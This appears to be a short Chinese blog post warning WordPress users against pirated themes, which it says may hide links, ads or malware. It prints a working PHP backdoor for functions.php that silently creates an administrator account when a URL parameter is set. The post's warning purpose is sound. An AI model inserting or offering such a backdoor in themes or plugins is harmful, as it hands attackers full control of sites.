WordPress除开很多官方网的主题风格,也有为数众多的主题风格设计师公布完全免费和收费标准主题风格,许多朋友常常四处搜集主题风格拿回家检测应用,在其中一些无良者将搜集到 的海外商业服务收费标准主题风格开展简体中文版改动,加上暗链、广告宣传,乃至恶意程序,随后完全免费或是收费标准公布发布出来,引诱他人下载并安装,做到不为人知的目地。此外,这种商业服务 收费标准主题风格一般全是检测版本号,主题风格编码不健全、作用缺少,某些公测版的商业服务主题风格开启后会全自动向数据库查询中载入很多数据信息…….
下边的编码更为邪惡,可以全自动加上一个人物为管理人员的客户。
- add_action(‘wp_head’, ‘holeinthewall’);
- function holeinthewall() {
- If ($_GET[‘backdoor’] == ‘go’) {
- require(‘wp-includes/registration.php’);
- If (!username_exists(‘username’)) {
- $user_id = wp_create_user(‘username’, ‘password’);
- $user = new WP_User($user_id);
- $user->set_role(‘administrator’);
- }
- }
- }
将编码加上到您当今主题风格的 functions.php 文档或软件中,会全自动建立一个登录名:username 登陆密码:password的有管理权限的客户,以后想要做什么都了。
因此,这儿劝告大伙儿或是不要在自身的网站上应用盗用主题风格和软件,尽可能到官方网或初始公布网站下载主题,以防被开侧门都不了解!
